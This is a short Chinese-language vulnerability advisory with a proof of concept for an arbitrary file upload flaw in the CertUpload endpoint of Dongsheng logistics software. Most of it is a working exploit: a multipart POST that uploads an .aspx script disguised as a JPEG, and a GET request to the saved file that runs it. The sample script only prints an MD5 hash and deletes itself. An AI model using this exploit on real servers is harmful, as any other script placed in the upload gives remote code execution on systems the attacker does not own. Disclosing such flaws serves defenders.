漏洞描述
文件上传漏洞发生在应用程序允许用户上传文件的功能中,如果上传功能未能正确地验证和限制上传文件的类型和内容,攻击者可能利用此漏洞上传恶意文件,如包含可执行代码的脚本文件,从而在服务器上执行任意命令,控制或破坏系统。
东胜物流软件 CertUpload 任意文件上传漏洞
PoC代码
POST /MsWlTruck/CertUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Length: 580
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close
Content-Type: multipart/form-data; boundary=--------------------------dewlibperhk4zgad5dyg
----------------------------dewlibperhk4zgad5dyg
Content-Disposition: form-data; name="file"; filename="9sxujaitgy.aspx"
Content-Type: image/jpeg
<%@Page Language="C#"%>
<%
Response.Write(FormsAuthentication.HashPasswordForStoringInConfigFile("123456", "MD5"));
System.IO.File.Delete(Request.PhysicalPath);
%>
----------------------------dewlibperhk4zgad5dyg
Content-Disposition: form-data; name="TruckNo"
1
----------------------------dewlibperhk4zgad5dyg
Content-Disposition: form-data; name="Cert_Type"
1
----------------------------dewlibperhk4zgad5dyg--
上传定位:
GET /Areas/TruckMng/CertImages/1/9sxujaitgy_20241118131215_9177.aspx HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Encoding: gzip, deflate, br
Connection: close